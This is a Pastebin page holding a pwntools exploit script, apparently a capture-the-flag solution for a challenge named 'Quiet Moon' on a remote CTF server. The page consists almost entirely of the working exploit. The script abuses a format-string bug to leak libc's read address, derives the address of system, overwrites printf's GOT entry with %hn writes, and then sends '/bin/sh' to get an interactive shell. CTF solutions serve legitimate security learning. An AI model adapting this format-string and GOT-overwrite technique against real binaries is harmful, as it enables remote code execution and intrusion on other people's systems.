Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Quiet Moon
- from pwn import *
- import re
- #r = process("./quietmoon.copy")
- r = remote("ctf.pwn.sg", 2901)
- read_GOT = 0x601048
- printf_GOT = 0x601030
- #leak
- def leak(addr):
- fmt = "|%8$s"
- fmt = fmt.ljust(16) + p64(addr)
- r.sendline(fmt)
- r.recvuntil("Can you find the Coven at /thecoven/flag?\n\n|")
- return u64(r.recvline()[:6]+'\x00\x00')
- read_LIBC = leak(read_GOT)
- system_LIBC = read_LIBC-0x110070+0x4f440
- #overwrite printf GOT address
- upper = system_LIBC%0x100000000/0x10000
- lower = system_LIBC%0x10000
- if upper > lower:
- fmt = "%"+str(lower)+"x%10$hn%"+str(upper-lower)+"x%11$hn"
- fmt = fmt.ljust(32) + p64(printf_GOT) + p64(printf_GOT+2)
- else:
- fmt = "%"+str(upper)+"x%10$hn%"+str(lower-upper)+"x%11$hn"
- fmt = fmt.ljust(32) + p64(printf_GOT+2) + p64(printf_GOT)
- r.sendline(fmt)
- r.sendline("/bin/sh")
- r.interactive()
- r.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement